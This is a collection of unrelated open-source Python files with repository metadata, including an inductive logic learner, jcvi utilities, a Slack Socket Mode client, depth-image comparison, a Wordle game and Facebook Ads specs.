def choose_literal(self, literals, examples):
"""Choose the best literal based on the information gain."""
return max(literals, key = partial(self.gain , examples = examples))
def gain(self, l ,examples):
"""
Find the utility of each literal when added to the body of the clause.
Utility function is:
gain(R, l) = T * (log_2 (post_pos / (post_pos + post_neg)) - log_2 (pre_pos / (pre_pos + pre_neg)))
where:
pre_pos = number of possitive bindings of rule R (=current set of rules)
pre_neg = number of negative bindings of rule R
post_pos = number of possitive bindings of rule R' (= R U {l} )
post_neg = number of negative bindings of rule R'
T = number of possitive bindings of rule R that are still covered
after adding literal l
"""
pre_pos = len(examples[0])
pre_neg = len(examples[1])
post_pos = sum([list(self.extend_example(example, l)) for example in examples[0]], [])
post_neg = sum([list(self.extend_example(example, l)) for example in examples[1]], [])
if pre_pos + pre_neg ==0 or len(post_pos) + len(post_neg)==0:
return -1
# number of positive example that are represented in extended_examples
T = 0
for example in examples[0]:
represents = lambda d: all(d[x] == example[x] for x in example)
if any(represents(l_) for l_ in post_pos):
T += 1
value = T * (log(len(post_pos) / (len(post_pos) + len(post_neg)) + 1e-12,2) - log(pre_pos / (pre_pos + pre_neg),2))
return value
def update_examples(self, target, examples, extended_examples):
"""Add to the kb those examples what are represented in extended_examples
List of omitted examples is returned."""
uncovered = []
for example in examples:
represents = lambda d: all(d[x] == example[x] for x in example)
if any(represents(l) for l in extended_examples):
self.tell(subst(example, target))
else:
uncovered.append(example)
return uncovered
# ______________________________________________________________________________
def check_all_consistency(examples, h):
"""Check for the consistency of all examples under h."""
for e in examples:
if not is_consistent(e, h):
return False
return True
def check_negative_consistency(examples, h):
"""Check if the negative examples are consistent under h."""
for e in examples:
if e['GOAL']:
continue
if not is_consistent(e, [h]):
return False
return True
def disjunction_value(e, d):
"""The value of example e under disjunction d."""
for k, v in d.items():
if v[0] == '!':
# v is a NOT expression
# e[k], thus, should not be equal to v
if e[k] == v[1:]:
return False
elif e[k] != v:
return False
return True
def guess_value(e, h):
"""Guess value of example e under hypothesis h."""
for d in h:
if disjunction_value(e, d):
return True
return False
def is_consistent(e, h):
return e["GOAL"] == guess_value(e, h)
def false_positive(e, h):
return guess_value(e, h) and not e["GOAL"]
def false_negative(e, h):
return e["GOAL"] and not guess_value(e, h)
| 32.529551 | 124 | 0.58968 |
4a1b4bfe508e38bb42a685ab529e852e9f4c7512
| 639 |
py
|
Python
|
src/controller/HomeContoller.py
|
SubhasisDutta/NoteBook
|
986c73338cdbd8743ffb01c8b91decb0a7178d42
|
[
"MIT"
] | 3 |
2015-05-04T13:52:11.000Z
|
2016-05-22T04:00:43.000Z
|
src/controller/HomeContoller.py
|
SubhasisDutta/ProfileApp
|
986c73338cdbd8743ffb01c8b91decb0a7178d42
|
[
"MIT"
] | 4 |
2015-07-03T12:59:23.000Z
|
2015-07-03T13:35:44.000Z
|
src/controller/HomeContoller.py
|
SubhasisDutta/ProfileApp
|
986c73338cdbd8743ffb01c8b91decb0a7178d42
|
[
"MIT"
] | null | null | null |
import webapp2
import os
from google.appengine.ext.webapp import template
from src.model.WorkModels import Work
class HomePage(webapp2.RequestHandler):
def get(self):
self.response.headers["Content-Type"]="text/html"
publishedWork=Work.gql("WHERE publish=True ORDER BY order ")
template_values = {
'pageTitle':"Subhasis Dutta ",
'works':publishedWork
}
path=os.path.join(os.path.dirname(__file__),'../../template/index_old.html')
page=template.render(path,template_values)
self.response.out.write(page)
| 37.588235 | 84 | 0.621283 |
4a1b4c9ac7eb1bf19248b7e29754906cca9ab59b
| 41 |
py
|
Python
|
min_to_sec.py
|
rfaria/misc
|
c68426d97b8ee635ffe0642f986e584367be68e5
|
[
"MIT"
] | null | null | null |
min_to_sec.py
|
rfaria/misc
|
c68426d97b8ee635ffe0642f986e584367be68e5
|
[
"MIT"
] | null | null | null |
min_to_sec.py
|
rfaria/misc
|
c68426d97b8ee635ffe0642f986e584367be68e5
|
[
"MIT"
] | null | null | null |
def convert(minutes):
return minutes*60
| 13.666667 | 21 | 0.780488 |
4a1b4d0b01d78c2a7b6f13a4c447bc568f9bd297
| 13,240 |
py
|
Python
|
utils/cbook.py
|
zhaotao1987/jcvi
|
748fcdbbd1db5eb8a4ccfe19eec6072006ffd501
|
[
"BSD-2-Clause"
] | 2 |
2019-04-05T21:01:45.000Z
|
2021-02-13T11:38:10.000Z
|
utils/cbook.py
|
zhaotao1987/jcvi
|
748fcdbbd1db5eb8a4ccfe19eec6072006ffd501
|
[
"BSD-2-Clause"
] | null | null | null |
utils/cbook.py
|
zhaotao1987/jcvi
|
748fcdbbd1db5eb8a4ccfe19eec6072006ffd501
|
[
"BSD-2-Clause"
] | 1 |
2019-01-21T15:49:24.000Z
|
2019-01-21T15:49:24.000Z
|
"""
Useful recipes from various internet sources (thanks)
mostly decorator patterns
"""
import os.path as op
import re
import sys
import logging
import functools
from collections import defaultdict
class memoized(object):
"""
Decorator that caches a function's return value each time it is called.
If called later with the same arguments, the cached value is returned, and
not re-evaluated.
Taken from recipe (http://wiki.python.org/moin/PythonDecoratorLibrary)
"""
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args):
try:
return self.cache[args]
except KeyError:
value = self.func(*args)
self.cache[args] = value
return value
except TypeError:
# uncachable -- for instance, passing a list as an argument.
# Better to not cache than to blow up entirely.
return self.func(*args)
def __repr__(self):
"""Return the function's docstring."""
return self.func.__doc__
def __get__(self, obj, objtype):
"""Support instance methods."""
return functools.partial(self.__call__, obj)
def inspect(item, maxchar=80):
"""
Inspect the attributes of an item.
"""
for i in dir(item):
try:
member = str(getattr(item, i))
if maxchar and len(member) > maxchar:
member = member[:maxchar] + "..."
except:
member = "[ERROR]"
print >> sys.stderr, "{}: {}".format(i, member)
def timeit(func):
"""
<http://www.zopyx.com/blog/a-python-decorator-for-measuring-the-execution-time-of-methods>
"""
import time
def timed(*args, **kw):
ts = time.time()
result = func(*args, **kw)
te = time.time()
msg = "{0}{1} {2:.2f}s".format(func.__name__, args, te - ts)
logging.debug(msg)
return result
return timed
def depends(func):
"""
Decorator to perform check on infile and outfile. When infile is not present, issue
warning, and when outfile is present, skip function calls.
"""
from jcvi.apps.base import need_update, listify
infile = "infile"
outfile = "outfile"
def wrapper(*args, **kwargs):
assert outfile in kwargs, \
"You need to specify `outfile=` on function call"
if infile in kwargs:
infilename = listify(kwargs[infile])
for x in infilename:
assert op.exists(x), \
"The specified infile `{0}` does not exist".format(x)
outfilename = kwargs[outfile]
if need_update(infilename, outfilename):
return func(*args, **kwargs)
else:
msg = "File `{0}` exists. Computation skipped." \
.format(outfilename)
logging.debug(msg)
outfilename = listify(outfilename)
for x in outfilename:
assert op.exists(x), \
"Something went wrong, `{0}` not found".format(x)
return outfilename
return wrapper
"""
Functions that make text formatting easier.
"""
class Registry (defaultdict):
def __init__(self, *args, **kwargs):
super(Registry, self).__init__(list, *args, **kwargs)
def iter_tag(self, tag):
for key, ts in self.items():
if tag in ts:
yield key
def get_tag(self, tag):
return list(self.iter_tag(tag))
def count(self, tag):
return sum(1 for x in self.iter_tag(tag))
def update_from(self, filename):
from jcvi.formats.base import DictFile
d = DictFile(filename)
for k, v in d.items():
self[k].append(v)
class SummaryStats (object):
def __init__(self, a, dtype=None, title=None):
import numpy as np
self.data = a = np.array(a, dtype=dtype)
self.min = a.min()
self.max = a.max()
self.size = a.size
self.mean = np.mean(a)
self.sd = np.std(a)
self.median = np.median(a)
self.sum = a.sum()
self.title = title
a.sort()
self.firstq = a[self.size / 4]
self.thirdq = a[self.size * 3 / 4]
self.p1 = a[int(self.size * .025)]
self.p2 = a[int(self.size * .975)]
if dtype == "int":
self.mean = int(self.mean)
self.sd = int(self.sd)
self.median = int(self.median)
def __str__(self):
s = self.title + ": " if self.title else ""
s += "Min={0} Max={1} N={2} Mean={3} SD={4} Median={5} Sum={6}".\
format(self.min, self.max, self.size,
self.mean, self.sd, self.median,
self.sum)
return s
def todict(self, quartile=False):
d = {
"Min": self.min, "Max": self.max,
"Mean": self.mean, "Median": self.median
}
if quartile:
d.update({
"1st Quartile": self.firstq, "3rd Quartile": self.thirdq
})
return d
def tofile(self, filename):
fw = open(filename, "w")
for x in self.data:
print >> fw, x
fw.close()
logging.debug("Array of size {0} written to file `{1}`.".\
format(self.size, filename))
class AutoVivification(dict):
"""
Implementation of perl's autovivification feature.
Thanks to <http://stackoverflow.com/questions/651794/whats-the-best-way-to-initialize-a-dict-of-dicts-in-python>
"""
def __getitem__(self, item):
try:
return dict.__getitem__(self, item)
except KeyError:
value = self[item] = type(self)()
return value
def enumerate_reversed(sequence):
"""
Perform reverse enumeration, returning an iterator with decrementing
index/position values
Source: http://stackoverflow.com/questions/529424/traverse-a-list-in-reverse-order-in-python
"""
for index in reversed(xrange(len(sequence))):
yield index, sequence[index]
def percentage(a, b, precision=1, mode=0):
"""
>>> percentage(100, 200)
'100 of 200 (50.0%)'
"""
pct = "{0:.{1}f}%".format(a * 100. / b, precision)
a, b = thousands(a), thousands(b)
if mode == 0:
return "{0} of {1} ({2})".format(a, b, pct)
elif mode == 1:
return "{0} ({1})".format(a, pct)
return pct
def thousands(x):
"""
>>> thousands(12345)
'12,345'
"""
import locale
try:
locale.setlocale(locale.LC_ALL, "en_US.utf8")
except Exception:
locale.setlocale(locale.LC_ALL, "en_US.UTF-8")
finally:
s = '%d' % x
groups = []
while s and s[-1].isdigit():
groups.append(s[-3:])
s = s[:-3]
return s + ','.join(reversed(groups))
return locale.format('%d', x, True)
SUFFIXES = {1000: ['', 'Kb', 'Mb', 'Gb', 'Tb', 'Pb', 'Eb', 'Zb'],
1024: ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB']}
def human_size(size, a_kilobyte_is_1024_bytes=False, precision=1, target=None):
'''Convert a file size to human-readable form.
Keyword arguments:
size -- file size in bytes
a_kilobyte_is_1024_bytes -- if True (default), use multiples of 1024
if False, use multiples of 1000
Returns: string
Credit: <http://diveintopython3.org/your-first-python-program.html>
>>> print(human_size(1000000000000, True))
931.3GiB
>>> print(human_size(1000000000000))
1.0Tb
>>> print(human_size(300))
300.0
'''
if size < 0:
raise ValueError('number must be non-negative')
multiple = 1024 if a_kilobyte_is_1024_bytes else 1000
for suffix in SUFFIXES[multiple]:
if target:
if suffix == target:
break
size /= float(multiple)
else:
if size >= multiple:
size /= float(multiple)
else:
break
return '{0:.{1}f}{2}'.format(size, precision, suffix)
def autoscale(bp, optimal=6):
"""
>>> autoscale(150000000)
20000000
>>> autoscale(97352632)
10000000
"""
slen = str(bp)
tlen = slen[0:2] if len(slen) > 1 else slen[0]
precision = len(slen) - 2 # how many zeros we need to pad?
bp_len_scaled = int(tlen) # scale bp_len to range (0, 100)
tick_diffs = [(x, abs(bp_len_scaled / x - optimal)) for x in [1, 2, 5, 10]]
best_stride, best_tick_diff = min(tick_diffs, key=lambda x: x[1])
while precision > 0:
best_stride *= 10
precision -= 1
return best_stride
def gene_name(st, exclude=("ev",), sep="."):
"""
Helper functions in the BLAST filtering to get rid alternative splicings.
This is ugly, but different annotation groups are inconsistent with respect
to how the alternative splicings are named. Mostly it can be done by removing
the suffix, except for ones in the exclude list.
"""
if any(st.startswith(x) for x in exclude):
sep = None
return st.rsplit(sep, 1)[0]
def seqid_parse(seqid, sep=["-", "_"], stdpf=True):
"""
This function tries to parse seqid (1st col in bed files)
return prefix, numeric id, and suffix, for example:
>>> seqid_parse('chr1_random')
('Chr', '1', '_random')
>>> seqid_parse('AmTr_v1.0_scaffold00001', '', stdpf=False)
('AmTr_v1.0_scaffold', '00001', '')
>>> seqid_parse('AmTr_v1.0_scaffold00001')
('Sca', '00001', '')
>>> seqid_parse('PDK_30s1055861')
('C', '1055861', '')
>>> seqid_parse('PDK_30s1055861', stdpf=False)
('PDK', '1055861', '')
>>> seqid_parse("AC235758.1", stdpf=False)
('AC', '235758.1', '')
"""
if "mito" in seqid or "chloro" in seqid:
return (seqid, "", "")
numbers = re.findall(r'\d+\.*\d*', seqid)
if not numbers:
return (seqid, "", "")
id = numbers[-1]
lastnumi = seqid.rfind(id)
suffixi = lastnumi + len(id)
suffix = seqid[suffixi:]
if sep is None:
sep = [""]
elif type(sep) == str:
sep = [sep]
prefix = seqid[: lastnumi]
if not stdpf:
sep = "|".join(sep)
atoms = re.split(sep, prefix)
if len(atoms) == 1:
prefix = atoms[0]
else:
prefix = atoms[-2]
else: # use standard prefix
if re.findall("chr", prefix, re.I):
prefix = "Chr"
elif re.findall("sca", prefix, re.I):
prefix = "Sca"
elif re.findall("supercontig", prefix, re.I):
prefix = "SCg"
elif re.findall("ctg|contig", prefix, re.I):
prefix = "Ctg"
elif re.findall("BAC", prefix, re.I):
prefix = "BAC"
else:
prefix = "C"
return prefix, id, suffix
def fixChromName(name, orgn="medicago"):
"""
Convert quirky chromosome names encountered in different
release files, which are very project specific, into a more
general format.
For example, in Medicago
Convert a seqid like
`Mt3.5.1_Chr1` to `chr1`
`Mt3.5_Chr3` to `chr3`
`chr01_pseudomolecule_IMGAG` to `chr1`
Some examples from Maize
Convert a seqid like
`chromosome:AGPv2:2:1:237068873:1` to `2`
Special cases
`chromosome:AGPv2:mitochondrion:1:569630:1` to `Mt`
`chromosome:AGPv2:chloroplast:1:140384:1` to `Pt`
"""
import re
mtr_pat1 = re.compile(r"Mt[0-9]+\.[0-9]+[\.[0-9]+]{0,}_([a-z]+[0-9]+)")
mtr_pat2 = re.compile(r"([A-z0-9]+)_[A-z]+_[A-z]+")
zmays_pat = re.compile(r"[a-z]+:[A-z0-9]+:([A-z0-9]+):[0-9]+:[0-9]+:[0-9]+")
zmays_sub = { 'mitochondrion' : 'Mt', 'chloroplast' : 'Pt' }
if orgn == "medicago":
for mtr_pat in (mtr_pat1, mtr_pat2):
match = re.search(mtr_pat, name)
if match:
n = match.group(1)
n = n.replace("0", "")
name = re.sub(mtr_pat, n, name)
elif orgn == "maize":
match = re.search(zmays_pat, name)
if match:
n = match.group(1)
name = re.sub(zmays_pat, n, name)
if name in zmays_sub:
name = zmays_sub[name]
return name
def fill(text, delimiter="", width=70):
"""
Wrap text with width per line
"""
texts = []
for i in xrange(0, len(text), width):
t = delimiter.join(text[i:i + width])
texts.append(t)
return "\n".join(texts)
def tile(lt, width=70, gap=1):
"""
Pretty print list of items.
"""
from jcvi.utils.iter import grouper
max_len = max(len(x) for x in lt) + gap
items_per_line = max(width / max_len, 1)
lt = [x.rjust(max_len) for x in lt]
g = list(grouper(lt, items_per_line, fillvalue=""))
return "\n".join("".join(x) for x in g)
def uniqify(L):
"""
Uniqify a list, maintains order (the first occurrence will be kept).
"""
seen = set()
nL = []
for a in L:
if a in seen:
continue
nL.append(a)
seen.add(a)
return nL
if __name__ == '__main__':
import doctest
doctest.testmod()
| 27.525988 | 116 | 0.556647 |
4a1b4d8b2b8cdedf5e7b989a5c3e8d3256e7454b
| 6,278 |
py
|
Python
|
slack_sdk/socket_mode/async_client.py
|
jans-forks/python-slackclient
|
ff798cbe00ead477ce98efa8468cb2c1c99635f3
|
[
"MIT"
] | 2 |
2021-09-11T06:18:24.000Z
|
2021-10-30T14:00:48.000Z
|
slack_sdk/socket_mode/async_client.py
|
QAtest-Inc/python-slack-sdk
|
61f098311adbd6d2904f51541cf5d8bf42c83168
|
[
"MIT"
] | 1 |
2021-09-12T23:26:37.000Z
|
2021-09-12T23:26:37.000Z
|
slack_sdk/socket_mode/async_client.py
|
QAtest-Inc/python-slack-sdk
|
61f098311adbd6d2904f51541cf5d8bf42c83168
|
[
"MIT"
] | 1 |
2021-09-13T10:07:14.000Z
|
2021-09-13T10:07:14.000Z
|
import asyncio
import json
import logging
from asyncio import Queue, Lock
from asyncio.futures import Future
from logging import Logger
from typing import Dict, Union, Any, Optional, List, Callable, Awaitable
from slack_sdk.errors import SlackApiError
from slack_sdk.socket_mode.async_listeners import (
AsyncWebSocketMessageListener,
AsyncSocketModeRequestListener,
)
from slack_sdk.socket_mode.request import SocketModeRequest
from slack_sdk.socket_mode.response import SocketModeResponse
from slack_sdk.web.async_client import AsyncWebClient
class AsyncBaseSocketModeClient:
logger: Logger
web_client: AsyncWebClient
app_token: str
wss_uri: str
auto_reconnect_enabled: bool
trace_enabled: bool
closed: bool
connect_operation_lock: Lock
message_queue: Queue
message_listeners: List[
Union[
AsyncWebSocketMessageListener,
Callable[
["AsyncBaseSocketModeClient", dict, Optional[str]], Awaitable[None]
],
]
]
socket_mode_request_listeners: List[
Union[
AsyncSocketModeRequestListener,
Callable[["AsyncBaseSocketModeClient", SocketModeRequest], Awaitable[None]],
]
]
async def issue_new_wss_url(self) -> str:
try:
response = await self.web_client.apps_connections_open(
app_token=self.app_token
)
return response["url"]
except SlackApiError as e:
if e.response["error"] == "ratelimited":
# NOTE: ratelimited errors rarely occur with this endpoint
delay = int(e.response.headers.get("Retry-After", "30")) # Tier1
self.logger.info(f"Rate limited. Retrying in {delay} seconds...")
await asyncio.sleep(delay)
# Retry to issue a new WSS URL
return await self.issue_new_wss_url()
else:
# other errors
self.logger.error(f"Failed to retrieve WSS URL: {e}")
raise e
async def is_connected(self) -> bool:
return False
async def connect(self):
raise NotImplementedError()
async def disconnect(self):
raise NotImplementedError()
async def connect_to_new_endpoint(self, force: bool = False):
try:
await self.connect_operation_lock.acquire()
if self.trace_enabled:
self.logger.debug(
"For reconnection, the connect_operation_lock was acquired"
)
if force or not await self.is_connected():
self.wss_uri = await self.issue_new_wss_url()
await self.connect()
finally:
if self.connect_operation_lock.locked() is True:
self.connect_operation_lock.release()
if self.trace_enabled:
self.logger.debug(
"The connect_operation_lock for reconnection was released"
)
async def close(self):
self.closed = True
await self.disconnect()
async def send_message(self, message: str):
raise NotImplementedError()
async def send_socket_mode_response(
self, response: Union[Dict[str, Any], SocketModeResponse]
):
if isinstance(response, SocketModeResponse):
await self.send_message(json.dumps(response.to_dict()))
else:
await self.send_message(json.dumps(response))
async def enqueue_message(self, message: str):
await self.message_queue.put(message)
if self.logger.level <= logging.DEBUG:
queue_size = self.message_queue.qsize()
self.logger.debug(
f"A new message enqueued (current queue size: {queue_size})"
)
async def process_messages(self):
try:
while not self.closed:
try:
await self.process_message()
except Exception as e:
self.logger.exception(f"Failed to process a message: {e}")
except asyncio.CancelledError:
if self.trace_enabled:
self.logger.debug("The running process_messages task is now cancelled")
raise
async def process_message(self):
raw_message = await self.message_queue.get()
if raw_message is not None:
message: dict = {}
if raw_message.startswith("{"):
message = json.loads(raw_message)
_: Future[None] = asyncio.ensure_future(
self.run_message_listeners(message, raw_message)
)
async def run_message_listeners(self, message: dict, raw_message: str) -> None:
type, envelope_id = message.get("type"), message.get("envelope_id")
if self.logger.level <= logging.DEBUG:
self.logger.debug(
f"Message processing started (type: {type}, envelope_id: {envelope_id})"
)
try:
if message.get("type") == "disconnect":
await self.connect_to_new_endpoint(force=True)
return
for listener in self.message_listeners:
try:
await listener(self, message, raw_message)
except Exception as e:
self.logger.exception(f"Failed to run a message listener: {e}")
if len(self.socket_mode_request_listeners) > 0:
request = SocketModeRequest.from_dict(message)
if request is not None:
for listener in self.socket_mode_request_listeners:
try:
await listener(self, request)
except Exception as e:
self.logger.exception(
f"Failed to run a request listener: {e}"
)
except Exception as e:
self.logger.exception(f"Failed to run message listeners: {e}")
finally:
if self.logger.level <= logging.DEBUG:
self.logger.debug(
f"Message processing completed (type: {type}, envelope_id: {envelope_id})"
)
| 36.929412 | 94 | 0.590953 |
4a1b4da8befbf6356d11567d50a322599417d4bb
| 1,038 |
py
|
Python
|
pipedream/tests/async_test.py
|
tgecho/pipedream
|
2e619d0ff72ae0f5e01620611a09f47c52127200
|
[
"BSD-2-Clause"
] | 1 |
2015-06-10T20:28:30.000Z
|
2015-06-10T20:28:30.000Z
|
pipedream/tests/async_test.py
|
tgecho/pipedream
|
2e619d0ff72ae0f5e01620611a09f47c52127200
|
[
"BSD-2-Clause"
] | null | null | null |
pipedream/tests/async_test.py
|
tgecho/pipedream
|
2e619d0ff72ae0f5e01620611a09f47c52127200
|
[
"BSD-2-Clause"
] | null | null | null |
def do_stuff(one=1, two=2):
return one + two
def test_call(pool):
result = pool.do(do_stuff)
assert result == 3
def test_call_with_args(pool):
result = pool.do(do_stuff, 2, 3)
assert result == 5
def test_call_with_kwargs(pool):
result = pool.do(do_stuff, one=2, two=3)
assert result == 5
def test_call_with_both(pool):
result = pool.do(do_stuff, 2, two=3)
assert result == 5
def break_things():
return 1/0
def handle_breakage(func):
try:
func()
except ZeroDivisionError as exc:
return exc
def test_exception_handling(pool):
result = pool.do(handle_breakage, break_things)
assert isinstance(result, ZeroDivisionError)
def one_func():
return 1
def two_func(a):
return a + 1
def test_interplay(combination):
# Ensure that each async backend can handle recieving a future from any other type of backend.
one, two = combination
one_future = one.do(one_func)
two_future = two.do(two_func, one_future)
assert two_future == 2
| 18.872727 | 98 | 0.677264 |
4a1b4e60e8723e94544582c95db53b0eafc4501f
| 203 |
py
|
Python
|
joinstring/joinstring/__init__.py
|
RDIL/bluejay
|
7a2354b61c28b7b2a47b96b55a2908944a07edfb
|
[
"MIT"
] | 3 |
2020-01-15T04:17:20.000Z
|
2022-03-05T17:49:51.000Z
|
joinstring/joinstring/__init__.py
|
RDIL/bluejay
|
7a2354b61c28b7b2a47b96b55a2908944a07edfb
|
[
"MIT"
] | null | null | null |
joinstring/joinstring/__init__.py
|
RDIL/bluejay
|
7a2354b61c28b7b2a47b96b55a2908944a07edfb
|
[
"MIT"
] | null | null | null |
"""Performance-friendly string combining utility."""
def joinstring(string1: str, string2: str) -> str:
"""Performance-friendly string combining function."""
return "".join([string1, string2])
| 29 | 57 | 0.704433 |
4a1b505050706b8467d301511276256aeb219803
| 2,592 |
py
|
Python
|
gibson/core/channels/archive/compare_img.py
|
rainprob/GibsonEnv
|
e0d0bc614713c676cb303bf9f11ca6a98713e0e0
|
[
"MIT"
] | 731 |
2018-02-26T18:35:05.000Z
|
2022-03-23T04:00:09.000Z
|
gibson/core/channels/archive/compare_img.py
|
Shubodh/GibsonEnv
|
38274874d7c2c2a87efdb6ee529f2b366c5219de
|
[
"MIT"
] | 111 |
2018-04-19T01:00:22.000Z
|
2022-03-18T17:43:50.000Z
|
gibson/core/channels/archive/compare_img.py
|
Shubodh/GibsonEnv
|
38274874d7c2c2a87efdb6ee529f2b366c5219de
|
[
"MIT"
] | 153 |
2018-02-27T04:38:40.000Z
|
2022-03-28T08:10:39.000Z
|
from PIL import Image
import numpy as np
import matplotlib.mlab as mlab
import matplotlib.pyplot as plt
#opengl_path = "/home/jerry/Pictures/point_0_view_2_domain_fixatedpose.png"
opengl_path = "/home/jerry/Pictures/point_0_view_2_domain_fixatedpose_mist.png"
#blender_path = "/home/jerry/Desktop/Data/1CzjpjNF8qk/depth/point_0_view_2_domain_depth.png"
blender_path = "/home/jerry/Desktop/Data/1CzjpjNF8qk/mist/point_0_view_2_domain_mist.png"
outline_path = "/home/jerry/Pictures/point_0_view_2_domain_outline.png"
opengl_viz = "/home/jerry/Pictures/point_0_view_2_domain_viz.png"
opengl_img = Image.open(opengl_path)
blender_img = Image.open(blender_path)
opengl_arr = np.asarray(opengl_img)
blender_arr = np.asarray(blender_img)
## Opengl: opengl_arr[:, :, 0]
## Blender: blender_arr
#opengl_arr = opengl_arr[:, :, 0].reshape((1, -1))[0] ## fpa version
# quick fix for visualization
## TODO: cpp png saving upside down
#opengl_arr
opengl_arr = opengl_arr[::-1][:]
#print(opengl_arr.shape, blender_arr.shape)
outline_arr = opengl_arr.copy()
for row in range(opengl_arr.shape[0]):
for col in range(opengl_arr.shape[1]):
if np.abs(opengl_arr[row][col] - blender_arr[row][col]) > 3:
print(opengl_arr[row][col], blender_arr[row][col])
outline_arr[row][col] = 65535
im = Image.new('L', (512, 512))
im.putdata(outline_arr.flatten().tolist())
im.save(outline_path)
viz_arr = opengl_arr.copy()
viz_arr = viz_arr * 128.0 / 65535
viz_arr = np.power(viz_arr, 5)
print(viz_arr)
im = Image.new('L', (512, 512))
im.putdata(viz_arr.flatten().tolist())
im.save(opengl_viz)
opengl_arr = opengl_arr.reshape((1, -1))[0] ## png version
blender_arr = blender_arr.reshape((1, -1))[0]
print("before clamping, max blender: ", max(blender_arr))
print(opengl_arr)
print(np.min(opengl_arr), np.max(opengl_arr), len(opengl_arr))
print(np.min(blender_arr),np.max(blender_arr), len(blender_arr))
diff_count = np.sum((opengl_arr != blender_arr))
diff_sqsum = np.sum(np.square(opengl_arr - blender_arr))
total_count = len(opengl_arr)
total_sqsum = np.sum(np.square(opengl_arr))
print('How many different', diff_count, float(diff_count) / total_count)
print('Total square diff', diff_sqsum, float(diff_sqsum) / total_sqsum)
blender_arr = blender_arr[blender_arr < 65535]
plt.subplot(2, 1, 1)
n, bins, patches = plt.hist(opengl_arr, 50, normed=1, label='opengl', alpha=0.75)
plt.legend(loc='upper right')
plt.subplot(2, 1, 2)
n, bins, patches = plt.hist(blender_arr, 50, normed=1, label='blender', alpha=0.75)
plt.legend(loc='upper right')
plt.show()
| 30.857143 | 92 | 0.735725 |
4a1b517d55a8b6f0d887ef5f092defbbb5bb85b5
| 2,082 |
py
|
Python
|
wordle/human_input.py
|
bbayramoglu/repPython
|
e8f0bc0f492d10f77ee907fa976e3715600ed4a1
|
[
"MIT"
] | null | null | null |
wordle/human_input.py
|
bbayramoglu/repPython
|
e8f0bc0f492d10f77ee907fa976e3715600ed4a1
|
[
"MIT"
] | null | null | null |
wordle/human_input.py
|
bbayramoglu/repPython
|
e8f0bc0f492d10f77ee907fa976e3715600ed4a1
|
[
"MIT"
] | null | null | null |
from pc_job import Listing, Split_word, Select_word
from colorama import Fore, Style
used_right=0
guess = []
right_p=["","","","",""]
falses=[]
main_w=Split_word.splittedWord
#print(main_w)
while True:
false_p=["","","","",""]
if main_w==right_p:
print(f"{Fore.BLUE}Tebrikler kelimeyi buldunuz{Style.RESET_ALL}")
break
if used_right>=6:
print(f"{Fore.RED}Hakkınız kalmadı günün kelimesi:{Style.RESET_ALL}{Fore.YELLOW} {Select_word.word} {Style.RESET_ALL}")
break
g2=input("5 harfli bir kelime giriniz: ")
with open("C:/Users/Furkan/Desktop/docs/anna/wordle/words_entered.txt","a+",encoding="utf-8") as file:
if len(g2)==5 and g2 not in file:
file.write(f"{g2}\n")
g1=g2.strip().lower()
if g1 == "ok":
break
elif g1 not in Listing.words:
print(f"{Fore.RED}Listede olmayan bir kelime girdiniz. Tekrar giriniz{Style.RESET_ALL}")
print(f"{Fore.YELLOW}{used_right} hakkını kullandın{Style.RESET_ALL}".center(100,"*"))
else:
li=[]
for i in g1:
li.append(i)
if li in guess:
print(f"{Fore.YELLOW}{used_right} hakkını kullandın{Style.RESET_ALL}".center(100,"*"))
print("Önceden girdiğiniz kelimeyi giremezsiniz.")
else:
used_right+=1
print(f"{Fore.YELLOW}{used_right} hakkını kullandın{Style.RESET_ALL}".center(100,"*"))
guess.append(li)
for i in range(0,len(guess)):
for j in range (0,len(main_w)):
if guess[i][j] in main_w:
if guess[i][j]==main_w[j]:
right_p[j]=guess[i][j]
elif guess[i][j] !=main_w:
false_p=["","","","",""]
false_p[j]=guess[i][j]
falses.append(false_p)
print(f"{Fore.GREEN}{right_p}{Style.RESET_ALL}")
for i in falses:
print(f"{Fore.YELLOW}{i}{Style.RESET_ALL}")
| 39.283019 | 128 | 0.540346 |
4a1b52304c3af41eda1b20101e29cc3b1c6541e5
| 3,081 |
py
|
Python
|
python/facebookads/specs.py
|
wangqi/facebookads
|
74cc2a78d870ba059472870fd20b3147b32bf1ce
|
[
"Apache-2.0"
] | 4 |
2016-06-01T04:37:31.000Z
|
2018-02-15T06:47:01.000Z
|
python/facebookads/specs.py
|
wangqi/facebookads
|
74cc2a78d870ba059472870fd20b3147b32bf1ce
|
[
"Apache-2.0"
] | null | null | null |
python/facebookads/specs.py
|
wangqi/facebookads
|
74cc2a78d870ba059472870fd20b3147b32bf1ce
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Facebook, Inc.
# You are hereby granted a non-exclusive, worldwide, royalty-free license to
# use, copy, modify, and distribute this software in source code or binary
# form for use in connection with the web services and APIs provided by
# Facebook.
# As with any software that integrates with the Facebook platform, your use
# of this software is subject to the Facebook Developer Principles and
# Policies [http://developers.facebook.com/policy/]. This copyright notice
# shall be included in all copies or substantial portions of the software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
"""
specs module contains classes that help you define and create specs for use
in the Ads API.
"""
from facebookads.objects import AbstractObject
from facebookads.mixins import ValidatesFields
class ObjectStorySpec(ValidatesFields, AbstractObject):
class Field(object):
link_data = 'link_data'
offer_data = 'offer_data'
page_id = 'page_id'
photo_data = 'photo_data'
text_data = 'text_data'
video_data = 'video_data'
class AttachmentData(ValidatesFields, AbstractObject):
class Field(object):
description = 'description'
image_hash = 'image_hash'
link = 'link'
name = 'name'
picture = 'picture'
class LinkData(ValidatesFields, AbstractObject):
class Field(object):
call_to_action = 'call_to_action'
caption = 'caption'
child_attachments = 'child_attachments'
description = 'description'
image_hash = 'image_hash'
image_crops = 'image_crops'
link = 'link'
message = 'message'
name = 'name'
picture = 'picture'
class OfferData(ValidatesFields, AbstractObject):
class Field(object):
